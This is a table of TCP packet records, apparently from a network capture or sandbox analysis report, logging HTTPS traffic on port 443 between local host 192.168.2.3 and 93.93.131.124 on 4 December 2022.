| Dec 4, 2022 12:05:57.415771961 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.415776968 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.416220903 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.416292906 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.416299105 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.447844982 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.447977066 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.447999001 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.449655056 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.450001001 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.450103045 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.450130939 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.450193882 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.450242043 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.450309038 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.450366974 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.450424910 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.450479984 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.450542927 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.450587034 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.450645924 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.450695992 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.450746059 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.465617895 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.465636015 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.465742111 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.551867008 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.551920891 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.551949024 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.551954985 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.552145958 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.552159071 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.552258015 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.697448969 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.697488070 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.697623014 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.729238033 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.729291916 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.729321957 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.729515076 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.827545881 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.827581882 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.827708960 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.903893948 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.903956890 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.904022932 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.904273987 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.904330015 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.996114016 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.996148109 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.996289968 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.017884016 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.017914057 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.017998934 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.018039942 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.018129110 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.112616062 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.112648964 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.112806082 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.149950981 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.149986982 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.150010109 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.150197983 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.150258064 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.239927053 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.239974976 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.240133047 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.292727947 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.292762995 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.292782068 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.292876005 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.292954922 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.366493940 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.366559982 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.366755009 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.422132969 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.422183990 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.422204018 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.422300100 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.422388077 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.501763105 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.501797915 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.502099991 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.548537016 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.548576117 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.548602104 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.548712969 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.548806906 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.648519993 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.648572922 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.648731947 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.688091993 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.688136101 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.688155890 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.688323975 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.688361883 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.769615889 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.769658089 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.769861937 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.826687098 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.826747894 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.826786995 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.827001095 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.827152014 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.881161928 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.881228924 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.881421089 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.936311960 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.936345100 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.936364889 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:58.936496973 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:58.936570883 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:59.108673096 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:59.108711004 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:59.108860970 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:59.214308023 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:59.214342117 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:59.214356899 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:59.214447021 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:59.214540005 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:59.418905973 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:59.459408045 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:59.474287987 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:59.474335909 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:59.474474907 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:59.682957888 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:59.683114052 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:00.085930109 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:00.085966110 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:00.086277008 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:00.086296082 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:00.086318970 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:00.086371899 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:00.086384058 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:00.086386919 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:00.086457014 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:00.290918112 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:00.291021109 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:00.609268904 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:00.609314919 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:00.609338045 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:00.609400034 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:00.609414101 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:00.609452009 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:00.609503984 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:00.814935923 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:00.815021992 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:01.246902943 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:01.247121096 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:01.495145082 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:01.495212078 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:01.495248079 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:01.495270967 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:01.495304108 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:01.495326996 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:01.495357990 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:01.495376110 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:01.495419979 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:01.495444059 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:01.495502949 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:01.538217068 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:01.746947050 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:01.747119904 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:02.170948029 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:02.171134949 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:03.035020113 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:03.035284996 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:04.731050968 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:04.731266975 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:06.216084003 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:06.216150999 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:06.216172934 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:06.216294050 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:06.216319084 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:06.216332912 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:06.216406107 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:06.216442108 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:06.250406981 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:06.250449896 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:06.250482082 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:06.250494957 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:06.250566006 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:06.250608921 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:06.250636101 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:06.250654936 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:06.250675917 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:06.250685930 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:06.250700951 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:06.250714064 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:06.250736952 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:06.250756025 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:06.454920053 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:06.454983950 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:06.878906012 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:06.879024982 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:07.710921049 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:07.711083889 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:08.659018040 CET | 49702 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:08.659090042 CET | 443 | 49702 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:08.659178972 CET | 49702 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:08.966589928 CET | 49702 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:08.966650009 CET | 443 | 49702 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:09.069783926 CET | 443 | 49702 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:09.069998026 CET | 49702 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:09.106755018 CET | 49702 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:09.106800079 CET | 443 | 49702 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:09.107213020 CET | 443 | 49702 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:09.210319996 CET | 49702 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:09.309129953 CET | 49702 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:09.309166908 CET | 443 | 49702 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:09.343692064 CET | 443 | 49702 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:09.343791008 CET | 443 | 49702 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:09.343869925 CET | 49702 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:09.344451904 CET | 49702 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:09.345702887 CET | 49703 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:09.345772028 CET | 443 | 49703 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:09.345892906 CET | 49703 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:09.346256018 CET | 49703 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:09.346287012 CET | 443 | 49703 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:09.374922037 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:09.375149965 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:09.448579073 CET | 443 | 49703 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:09.454176903 CET | 49703 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:09.454241991 CET | 443 | 49703 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:09.516779900 CET | 443 | 49703 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:09.516863108 CET | 443 | 49703 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:09.516984940 CET | 49703 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:09.517019033 CET | 443 | 49703 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:09.530868053 CET | 49703 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:11.816942930 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:11.816992044 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:11.817012072 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:11.817117929 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:11.817127943 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:11.817291975 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.022916079 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.116811991 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.338903904 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.338989973 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.352758884 CET | 49704 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.352824926 CET | 443 | 49704 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.352900028 CET | 49704 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.362394094 CET | 49704 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.362423897 CET | 443 | 49704 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.383688927 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.383735895 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.383754015 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.383805990 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.383810043 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.383841038 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.383853912 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.383867025 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.383877993 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.383887053 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.383900881 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.383902073 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.383909941 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.383922100 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.383929014 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.383945942 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.383953094 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.383960962 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.383972883 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.383996964 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.384037018 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.461889982 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.461925983 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.462012053 CET | 443 | 49704 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.462023973 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.462049961 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.462059975 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.462131023 CET | 49704 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.463474989 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.464608908 CET | 49704 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:06:12.464623928 CET | 443 | 49704 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.465224028 CET | 443 | 49704 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.486394882 CET | 49704 | 443 | 192.168.2.3 | 93.93.131.124 |
